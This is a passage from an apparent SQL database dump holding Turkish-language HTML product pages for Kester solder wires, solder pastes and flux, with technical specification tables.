style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','275-K100-1.2mm','','','','275-k100-1.2mm'),(29,'Sn63Pb37 Tel Lehim - 0.8mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','245-Sn63Pb37-0.8mm','','','','245-sn63pb37-0.8mm'),(30,'Sn60Pb40 Tel Lehim','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_tel_formul.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;<img style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\" src=\"images/kester/kester_tel.jpg\" alt=\"\" border=\"0\" /></p>\r\n<hr class=\"system-pagebreak\" title=\"Tel Çapları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<strong>Standart Tel Çapları &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_wire%20diameter.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Flux Oranları\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Standart&nbsp;Flux Dolgu Boyutları</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"images/kester/Kester_Standart%20core%20sizes.png\" alt=\"\" width=\"254\" height=\"160\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','275-Sn60Pb40','','','','245-k100-28-29'),(31,'','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER KREM LEHİM ÜRÜNLERİ</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"http://www.3s-technologies.com.tr/images/urunler/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R256 KREM LEHİM</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">R256 özellikle reflow fırın ve stencil baskı proseslerinde maksimum kararlılık sağlamak üzere dizayn edilmiş, temizleme gerektirmeyen, hava ve nitrojen ortamlarına uygun bir krem lehimdir. R256 mümkün olan en geniş reflow proses penceresine sahiptir. 8 saatten fazla elek ömrüne sunar ve 90 dakikaya kadar olan duruşlardan sonra bile ilk seferde etkili bir baskı sağlar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>EM918 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">KESTER EM918, özellikle kurşunsuz lehimleme termal gereksinimleri düşünülerek üretilmiş, kurşun içermeyen, hava ve nitrojen ortamlarına uygun, temizleme gerektirmeyen bir krem lehimdir. EM918 aynı zamanda hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi ve 150mm/s\'ye kadar baskı hızı sağlar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','Krem Lehim','','','','krem-lehim'),(32,'Kurşunsuz Krem Lehim','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER NXG1 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>NXG1 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">KESTER NXG1, özellikle kurşunsuz lehimleme termal gereksinimleri düşünülerek üretilmiş</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşun içermeyen</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (8ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">NXG1&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">1850 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">46 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL1</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">8 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n</tbody>\r\n</table>','NXG1','','','','krem-lehim-31'),(33,'Kurşunsuz Krem Lehim','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER R276 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R276 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşun içermez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Krem lehim baskılı kartlar 8 saat bekleyebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (6ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">R276</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">650 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">30 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">6 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Dispensing&nbsp;</td>\r\n<td>Uygun</td>\r\n</tr>\r\n</tbody>\r\n</table>','R275-Kurşunsuz','','','','krem-lehim-31-32'),(34,'Kurşunlu Krem Lehim','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER R276 KURŞUNLU KREM LEHİM</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R276 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşunlu üretilebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Krem lehim baskılı kartlar 8 saat bekleyebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (6ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">R276</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">670 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">32 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">6 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Dispensing&nbsp;</td>\r\n<td>Uygun</td>\r\n</tr>\r\n</tbody>\r\n</table>','R275','','','','krem-lehim-31-32-33'),(36,'Flux (Su-bazlı)','<h5 style=\"text-align: left;\">KESTER SU-BAZLI FLUX</h5>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Ürün Bilgisi\" 